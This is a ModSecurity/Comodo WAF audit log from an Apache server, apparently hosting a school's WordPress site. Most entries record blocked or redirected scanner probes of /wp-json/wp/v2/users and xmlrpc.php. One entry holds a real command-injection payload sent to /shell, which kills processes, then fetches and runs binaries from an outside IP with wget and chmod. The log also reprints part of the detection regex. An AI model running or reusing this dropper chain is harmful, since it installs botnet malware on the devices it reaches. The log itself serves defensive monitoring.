Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --035b0c6a-Z-- --33b6686e-A-- [03/May/2025:23:59:29 +0700] aBZLccP0ZqGY3Jj2X92biwAAABA 103.236.140.4 46632 103.236.140.4 8181 --33b6686e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --33b6686e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33b6686e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291569315172 3056 (- - -) Stopwatch2: 1746291569315172 3056; combined=1358, p1=448, p2=879, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33b6686e-Z-- --749e6c15-A-- [03/May/2025:23:59:35 +0700] aBZLd4OgvPi2IO4kz1sA5QAAAIQ 103.236.140.4 46636 103.236.140.4 8181 --749e6c15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --749e6c15-C-- demo.sayHello --749e6c15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --749e6c15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291575947792 5202 (- - -) Stopwatch2: 1746291575947792 5202; combined=4027, p1=457, p2=3345, p3=32, p4=32, p5=94, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --749e6c15-Z-- --c5e2c023-A-- [04/May/2025:00:00:15 +0700] aBZLn0SOhfQ6W15Bgg8QewAAAEA 103.236.140.4 46658 103.236.140.4 8181 --c5e2c023-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c5e2c023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5e2c023-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291615483762 3200 (- - -) Stopwatch2: 1746291615483762 3200; combined=1459, p1=488, p2=940, p3=0, p4=0, p5=31, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5e2c023-Z-- --9826ce65-A-- [04/May/2025:00:00:22 +0700] aBZLpoOgvPi2IO4kz1sA7gAAAIA 103.236.140.4 46668 103.236.140.4 8181 --9826ce65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9826ce65-C-- demo.sayHello --9826ce65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9826ce65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291622292298 6078 (- - -) Stopwatch2: 1746291622292298 6078; combined=4443, p1=574, p2=3645, p3=31, p4=33, p5=93, sr=82, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9826ce65-Z-- --d6c94366-A-- [04/May/2025:00:00:48 +0700] aBZLwCleQJs6d7wanHHUFwAAANI 103.236.140.4 46684 103.236.140.4 8181 --d6c94366-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d6c94366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6c94366-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291648454255 3197 (- - -) Stopwatch2: 1746291648454255 3197; combined=1345, p1=447, p2=867, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6c94366-Z-- --eb40fb1a-A-- [04/May/2025:00:00:53 +0700] aBZLxcP0ZqGY3Jj2X92bkAAAABU 103.236.140.4 46698 103.236.140.4 8181 --eb40fb1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.213 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eb40fb1a-C-- demo.sayHello --eb40fb1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb40fb1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291653055041 6544 (- - -) Stopwatch2: 1746291653055041 6544; combined=4786, p1=646, p2=3741, p3=33, p4=37, p5=184, sr=80, sw=145, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb40fb1a-Z-- --715e1829-A-- [04/May/2025:00:03:39 +0700] aBZMa4OgvPi2IO4kz1sA9QAAAI4 103.236.140.4 46764 103.236.140.4 8181 --715e1829-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --715e1829-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --715e1829-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746291819480984 3137 (- - -) Stopwatch2: 1746291819480984 3137; combined=1457, p1=502, p2=920, p3=0, p4=0, p5=35, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --715e1829-Z-- --d3b3b81b-A-- [04/May/2025:00:03:44 +0700] aBZMcESOhfQ6W15Bgg8QgwAAAE8 103.236.140.4 46772 103.236.140.4 8181 --d3b3b81b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3b3b81b-C-- demo.sayHello --d3b3b81b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3b3b81b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746291824562404 6322 (- - -) Stopwatch2: 1746291824562404 6322; combined=4454, p1=557, p2=3624, p3=37, p4=37, p5=128, sr=75, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3b3b81b-Z-- --a3947477-A-- [04/May/2025:00:09:55 +0700] aBZN44OgvPi2IO4kz1sBIAAAAJA 103.236.140.4 46982 103.236.140.4 8181 --a3947477-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3947477-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3947477-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746292195569588 3118 (- - -) Stopwatch2: 1746292195569588 3118; combined=1334, p1=446, p2=857, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3947477-Z-- --cdc3d129-A-- [04/May/2025:00:10:01 +0700] aBZN6USOhfQ6W15Bgg8QjwAAAEU 103.236.140.4 46992 103.236.140.4 8181 --cdc3d129-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cdc3d129-C-- demo.sayHello --cdc3d129-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdc3d129-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746292201952776 4440 (- - -) Stopwatch2: 1746292201952776 4440; combined=3015, p1=454, p2=2399, p3=25, p4=27, p5=65, sr=55, sw=45, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdc3d129-Z-- --9f0fa957-A-- [04/May/2025:00:24:11 +0700] aBZRO4OgvPi2IO4kz1sBYQAAAIM 103.236.140.4 47416 103.236.140.4 8181 --9f0fa957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.134 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f0fa957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f0fa957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746293051301312 3329 (- - -) Stopwatch2: 1746293051301312 3329; combined=1470, p1=533, p2=902, p3=0, p4=0, p5=35, sr=150, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f0fa957-Z-- --29caef6d-A-- [04/May/2025:00:24:19 +0700] aBZRQ0SOhfQ6W15Bgg8QqgAAAFA 103.236.140.4 47426 103.236.140.4 8181 --29caef6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.134 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.134 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29caef6d-C-- demo.sayHello --29caef6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29caef6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746293059146345 6290 (- - -) Stopwatch2: 1746293059146345 6290; combined=4586, p1=574, p2=3604, p3=37, p4=37, p5=186, sr=79, sw=148, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29caef6d-Z-- --8ca3d45c-A-- [04/May/2025:00:55:15 +0700] aBZYg0SOhfQ6W15Bgg8RDAAAAEw 103.236.140.4 48550 103.236.140.4 8181 --8ca3d45c-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --8ca3d45c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ca3d45c-E-- --8ca3d45c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746294915542927 2393 (- - -) Stopwatch2: 1746294915542927 2393; combined=828, p1=504, p2=293, p3=0, p4=0, p5=31, sr=90, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ca3d45c-Z-- --7c930f17-A-- [04/May/2025:01:42:56 +0700] aBZjsESOhfQ6W15Bgg8RtgAAAEY 103.236.140.4 50416 103.236.140.4 8181 --7c930f17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7c930f17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c930f17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746297776168302 2533 (- - -) Stopwatch2: 1746297776168302 2533; combined=1165, p1=393, p2=743, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c930f17-Z-- --23147252-A-- [04/May/2025:01:42:58 +0700] aBZjsileQJs6d7wanHHUzwAAANM 103.236.140.4 50420 103.236.140.4 8181 --23147252-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23147252-C-- demo.sayHello --23147252-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23147252-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746297778984814 5284 (- - -) Stopwatch2: 1746297778984814 5284; combined=3937, p1=551, p2=3173, p3=27, p4=26, p5=93, sr=118, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23147252-Z-- --8a2a4364-A-- [04/May/2025:01:45:24 +0700] aBZkRIOgvPi2IO4kz1sCDAAAAJU 103.236.140.4 50438 103.236.140.4 8181 --8a2a4364-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a2a4364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a2a4364-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746297924611356 3205 (- - -) Stopwatch2: 1746297924611356 3205; combined=1491, p1=462, p2=937, p3=0, p4=0, p5=91, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a2a4364-Z-- --786e5d62-A-- 